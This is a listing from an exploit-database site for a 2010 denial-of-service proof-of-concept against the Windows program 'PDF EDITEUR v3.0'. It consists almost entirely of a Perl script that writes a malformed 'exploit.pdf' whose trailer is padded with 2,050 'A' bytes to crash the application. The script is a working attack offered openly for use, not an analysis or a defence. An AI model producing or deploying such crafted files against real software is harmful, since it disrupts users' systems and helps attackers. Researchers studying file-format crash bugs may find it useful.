[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PDF EDITEUR v3.0 - File Format Denial Of Service

Author
antrhacks
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12883
Category
dos / poc
Date add
10-08-2010
Platform
windows
================================================
PDF EDITEUR v3.0 - File Format Denial Of Service
================================================


# Title: PDF EDITEUR v3.0 - File Format Denial Of Service
# Author: antrhacks
# Software Link: http://www.01net.com/telecharger/windows/Bureautique/editeur_de_texte/fiches/27027.html
# Version: 3.00
# Platform:  Windows XP SP3 Home edition Fr



#!/usr/bin/perl
 
my $file= "exploit.pdf";
 
my $junk= "%PDF-1.4%вгПУ
203 0 obj
<</Linearized 1/L 53867/O 206/E 36259/N 2/T 49759/H [ 892 262]>>
endobj                
xref
203 29
trailer
<<" . "\x41" x  2050 . " 232/Prev 49747/XRefStm 1154/Root 204 0 R/Info 15 0 R/ID[<7DCD31CD45165DE26A7561A13AE64066><1AF7BC0CE6ED774EAA15CA98263EE96B>]>>
startxref
0
%%EOF
";
  
open($FILE, ">$file");

print($FILE $junk);

close($FILE);

print("[+] Your Exploit was created successfully");



#  0day.today [2024-07-02]  #